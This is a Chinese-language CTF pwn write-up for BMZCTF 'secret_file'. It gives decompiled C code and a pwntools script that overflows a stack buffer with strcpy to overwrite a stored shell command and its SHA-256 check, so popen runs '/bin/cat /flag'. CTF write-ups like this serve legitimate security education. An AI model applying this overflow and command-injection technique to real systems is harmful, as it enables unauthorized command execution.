[BMZCTF-pwn] 20-secret_file

栈内溢出的题

读完程序也就完事了

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  char *v3; // rax
  unsigned __int8 *v4; // rbp
  char *v5; // rbx
  __int64 v6; // rcx
  char *v7; // rdi
  unsigned int v8; // er12
  FILE *v9; // rbp
  size_t v11; // [rsp+0h] [rbp-308h] BYREF
  char *lineptr; // [rsp+8h] [rbp-300h] BYREF
  char dest[256]; // [rsp+10h] [rbp-2F8h] BYREF 输入的待加密的明文
  char v14[27]; // [rsp+110h] [rbp-1F8h] BYREF 初始化放入的命令
  char v15[65]; // [rsp+12Bh] [rbp-1DDh] BYREF 初始化放入的sha256值
  _QWORD v16[4]; // [rsp+16Ch] [rbp-19Ch] BYREF
  char v17[64]; // [rsp+18Ch] [rbp-17Ch] BYREF 用户输入前0x100加密后的sha256值
  int v18; // [rsp+1CCh] [rbp-13Ch] BYREF
  char s[264]; // [rsp+1D0h] [rbp-138h] BYREF
  unsigned __int64 v20; // [rsp+2D8h] [rbp-30h]

  v20 = __readfsqword(0x28u);
  sub_E60(dest);                                // md5值放到v15
  v11 = 0LL;
  lineptr = 0LL;
  if ( getline(&lineptr, &v11, stdin) == -1 )
    return 1;
  v3 = strrchr(lineptr, 10);
  if ( !v3 )
    return 1;
  *v3 = 0;
  v4 = (unsigned __int8 *)v16;
  v5 = v17;
  strcpy(dest, lineptr);
  sub_DD0((__int64)dest, v16, 0x100u);          // 对前0x100串加密
  do
  {
    v6 = *v4;
    v7 = v5;
    v5 += 2;
    ++v4;
    snprintf(v7, 3uLL, "%02x", v6);
  }
  while ( v5 != (char *)&v18 );
  v8 = strcmp(v15, v17);
  if ( v8 )
  {
    puts("wrong password!");
    return 1;
  }
  v9 = popen(v14, "r");
  if ( !v9 )
    return 1;
  while ( fgets(s, 256, v9) )
    printf("%s", s);
  fclose(v9);
  return v8;
}

程序先把一个命令和md5值放入v14,v15处。然后用户输入值放到desc处(v14前)。在这里只要通过输入超长将v14,v15覆盖即可。

from pwn import *

p = process('./pwn')
elf = ELF('./pwn')
context(arch = 'amd64', log_level = 'debug') #

payload = b'A'*(256)+ b'/bin/cat /flag;'.ljust(27, b'#')+b'e075f2f51cad23d0537186cfcd50f911ea954f9c2e32a437f45327f1b7899bbb'
p.sendline(payload)
p.recv()
pause()

你可能感兴趣的:(CTF,pwn,安全,pwn)